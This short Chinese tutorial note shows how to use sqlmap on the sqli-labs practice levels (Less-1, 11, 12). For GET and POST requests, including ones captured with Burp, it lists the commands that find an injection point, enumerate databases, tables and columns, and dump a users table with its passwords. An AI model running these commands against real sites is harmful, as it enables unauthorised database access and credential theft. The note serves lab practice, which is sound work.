sqlmap使用(以sqli-lab为例)
1.get使用方法:(Less-1 **Error Based- String**)
1.查看是否有注入点:sqlmap -u 网址
2.爆出数据库名:sqlmap -u 网址 --dbs
3.爆出数据库表名 sqlmap -u 网址 -D 'security' --tables
4.爆出指定表的列名: sqlmap -u 网址 -D 'security' -T 'users' --columns
5.dump出数据:sqlmap -u -D security -T users -C id,password,username --dump
2.post使用方法:(Less-11- Error Based- String)
1.使用burp抓包,将请求内容保存在txt文件中(或者使用-u 网址 --data ‘data’来代替)
sqlmap -r 文件位置
2.爆出数据库名:sqlmap -r 文件位置 --dbs
3.爆出表名:sqlmap -r 文件位置 -D XXX --tables
4.爆出列名:sqlmap -r 文件位置 -D xxx -T xxx -columns
5.dump出数据: sqlmap -r 文件位置 -D xxx -T xxx -C xxx --dump
Less-12- Error Based- Double quotes- String
参考链接:
详细sqli-labs(1-65)通关讲解_数据库_糊涂是福yyyy-DevPress官方社区 (csdn.net)